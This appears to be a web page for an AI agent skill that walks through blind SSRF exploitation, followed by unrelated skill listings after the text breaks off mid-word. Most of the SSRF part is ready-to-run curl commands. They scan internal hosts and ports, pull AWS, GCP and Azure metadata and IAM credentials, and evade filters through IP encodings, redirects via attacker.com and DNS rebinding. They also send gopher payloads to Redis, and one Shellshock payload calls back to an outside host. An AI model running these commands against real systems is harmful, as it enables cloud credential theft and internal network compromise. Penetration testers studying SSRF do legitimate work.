performing-blind-ssrf-exploitation
Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.
What this skill does
# Performing Blind SSRF Exploitation
## When to Use
- When testing URL/webhook input parameters where server-side responses are not reflected
- During assessment of applications that fetch external resources (avatars, previews, imports)
- When testing PDF generators, image processors, or document converters for SSRF
- During cloud security assessments to detect metadata endpoint access
- When evaluating webhook functionality and URL validation implementations
## Prerequisites
- Burp Suite Professional with Burp Collaborator for OOB detection
- interact.sh or webhook.site for external callback monitoring
- Understanding of SSRF attack vectors and internal network enumeration
- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
- VPS or controlled server for advanced exploitation callback handling
- Python with requests library for automation scripts
## Workflow
### Step 1 — Identify Blind SSRF Input Points
```bash
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=
# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
-H "Content-Type: application/json" \
-d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'
# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'
# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'
# Test document import
curl -X POST http://target.com/api/import \
-H "Content-Type: application/json" \
-d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
```
### Step 2 — Confirm Blind SSRF with Out-of-Band Detection
```bash
# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com
# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups
# HTTP-based detection
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator
# interact.sh alternative
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions
```
### Step 3 — Enumerate Internal Network
```bash
# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive
# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
start=$(date +%s%N)
curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
end=$(date +%s%N)
elapsed=$(( (end - start) / 1000000 ))
echo "$ip: ${elapsed}ms"
done
# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
curl -X POST http://target.com/api/fetch \
-d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
echo "Port $port tested"
done
# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
```
### Step 4 — Access Cloud Metadata Endpoints
```bash
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
# GCP metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'
# Azure metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
```
### Step 5 — Bypass SSRF Filters
```bash
# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}' # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}' # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}' # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}' # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}' # IPv6
# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://[email protected]/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'
# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'
# DNS rebinding
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
```
### Step 6 — Escalate Blind SSRF to Data Exfiltration
```bash
# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration
# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'
# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"
# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| Blind SSRF | Server makes request but response is not visible to attacker |
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
| SSRFmap | Automated SSRF detection and exploitation framework |
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
| webhook.site | Free webhook receiver for testing SSRF callbacks |
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |
## Common Scenarios
1. **Cloud Credential Theft** — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
2. **Internal Service Discovery** — Use timing-based blind SSRF to enumerate internal network hosts and open ports
3. **Redis Exploitation** — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
4. **Webhook Abuse** — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
5. **PDF Generator SSRF** — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents
## Output Format
```
## Blind SSRRelated in Cloud & DevOps
appbuilder-action-scaffolder
IncludedCreate, implement, deploy, and debug Adobe Runtime actions with consistent layout, validation, and error handling. Use this skill whenever the user needs to add actions to an App Builder project, understand action structure (params, response format, web/raw actions), configure actions in the manifest, use App Builder SDKs (State, Files, Events, database), deploy and invoke actions via CLI, debug action issues, or implement patterns such as webhook receivers, custom event providers, journaling consumers, large payload redirects, action sequence pipelines, and Asset Compute workers. Also trigger when users mention serverless functions in Adobe context, action logging, IMS authentication for actions, or cron-style scheduled actions.
orchestrating-datacloud
IncludedSalesforce Data Cloud product orchestrator for connect→prepare→harmonize→segment→act workflows. Use this skill when the user needs a multi-step Data Cloud pipeline, cross-phase troubleshooting, or data space and data kit management. TRIGGER when: user needs a multi-step Data Cloud pipeline, asks to set up or troubleshoot Data Cloud across phases, manages data spaces or data kits, or wants a cross-phase sf data360 workflow. DO NOT TRIGGER when: work is isolated to a single phase (use the matching phase-specific skill), the task is STDM/session tracing/parquet telemetry (use observing-agentforce), standard CRM SOQL (use querying-soql), or Apex implementation (use generating-apex).
github-project-automation
IncludedAutomate GitHub repository setup with CI/CD workflows, issue templates, Dependabot, and CodeQL security scanning. Includes 12 production-tested workflows and prevents 18 errors: YAML syntax, action pinning, and configuration. Use when: setting up GitHub Actions CI/CD, creating issue/PR templates, enabling Dependabot or CodeQL scanning, deploying to Cloudflare Workers, implementing matrix testing, or troubleshooting YAML indentation, action version pinning, secrets syntax, runner versions, or CodeQL configuration. Keywords: github actions, github workflow, ci/cd, issue templates, pull request templates, dependabot, codeql, security scanning, yaml syntax, github automation, repository setup, workflow templates, github actions matrix, secrets management, branch protection, codeowners, github projects, continuous integration, continuous deployment, workflow syntax error, action version pinning, runner version, github context, yaml indentation error
sf-datacloud
IncludedSalesforce Data Cloud product orchestrator for connect→prepare→harmonize→segment→act workflows. TRIGGER when: user needs a multi-step Data Cloud pipeline, asks to set up or troubleshoot Data Cloud across phases, manages data spaces or data kits, or wants a cross-phase `sf data360` workflow. DO NOT TRIGGER when: work is isolated to a single phase (use the matching sf-datacloud-* skill), the task is STDM/session tracing/parquet telemetry (use sf-ai-agentforce-observability), standard CRM SOQL (use sf-soql), or Apex implementation (use sf-apex).
fabric-cli
IncludedUse this skill for Fabric.so CLI workflows with the `fabric` terminal command: diagnose/install/login, search or browse a Fabric library, save notes/links/files, create folders, ask the Fabric AI assistant, manage tasks/workspaces, generate shell completion, check subscription usage, produce JSON output, and use Fabric as persistent agent memory. Do not use for Microsoft Fabric/Azure/Power BI `fab`, Daniel Miessler's Fabric framework, Python Fabric SSH, Fabric.js, or textile/fashion fabric.
lark
IncludedLark/Feishu CLI skills: lark-cli operations for docs, markdown, sheets, base, calendar, im, mail, task, okr, drive, wiki, slides, whiteboard, apps, approval, attendance, contact, vc, minutes, event. Use when the user needs to operate Lark/Feishu resources via lark-cli, send messages, manage documents, spreadsheets, calendars, tasks, OKRs, deploy web pages, or any Feishu/Lark workspace operations.